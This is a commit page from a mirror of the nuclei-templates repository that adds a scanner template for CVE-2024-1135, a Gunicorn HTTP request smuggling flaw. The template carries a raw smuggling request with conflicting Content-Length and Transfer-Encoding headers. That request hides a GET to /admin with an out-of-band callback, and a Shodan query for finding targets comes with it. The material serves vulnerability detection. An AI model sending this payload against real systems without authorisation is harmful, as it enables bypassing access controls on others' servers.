mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-01-31 15:53:33 +08:00
Added template for CVE-2024-1135
This commit is contained in:
Pwn4arn
61
CVE-2024-1135.yaml
Normal file
61
CVE-2024-1135.yaml
Normal file
@@ -0,0 +1,61 @@
|
||||
id: CVE-2024-1135
|
||||
|
||||
info:
|
||||
name: Gunicorn - HTTP Request Smuggling
|
||||
author: ManieshNeupane (Pwn4arn)
|
||||
severity: high
|
||||
description: |
|
||||
Gunicorn is vulnerable to HTTP Request Smuggling due to improper validation of the Transfer-Encoding header.
|
||||
If a request contains both Content-Length and a malformed or multiple Transfer-Encoding headers, Gunicorn
|
||||
may fall back to Content-Length. An attacker can exploit this to bypass security controls, poison caches,
|
||||
or manipulate session data.
|
||||
impact: |
|
||||
Successful exploitation could lead to unauthorized access to administrative endpoints or sensitive data
|
||||
by smuggling a secondary request that the server processes as a separate, legitimate request.
|
||||
remediation: |
|
||||
Update Gunicorn to a version that properly handles Transfer-Encoding headers or ensure the frontend
|
||||
proxy strictly validates these headers.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-1135
|
||||
- https://github.com/benoitc/gunicorn/releases
|
||||
- https://huntr.com/bounties/22158e34-cfd5-41ad-97e0-a780773d96c1
|
||||
- https://lists.debian.org/debian-lts-announce/2024/06/msg00027.html
|
||||
- https://lists.debian.org/debian-lts-announce/2024/12/msg00018.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2024-1135
|
||||
cwe-id: CWE-444
|
||||
epss-score: 0.00044
|
||||
epss-percentile: 0.1288
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: product:"gunicorn"
|
||||
tags: cve,cve2024,gunicorn,smuggling,network
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 6
|
||||
Transfer-Encoding: chunked,gzip
|
||||
|
||||
73
|
||||
|
||||
GET /admin?callback1=https://{{interactsh-url}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
0
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
Reference in New Issue
Block a user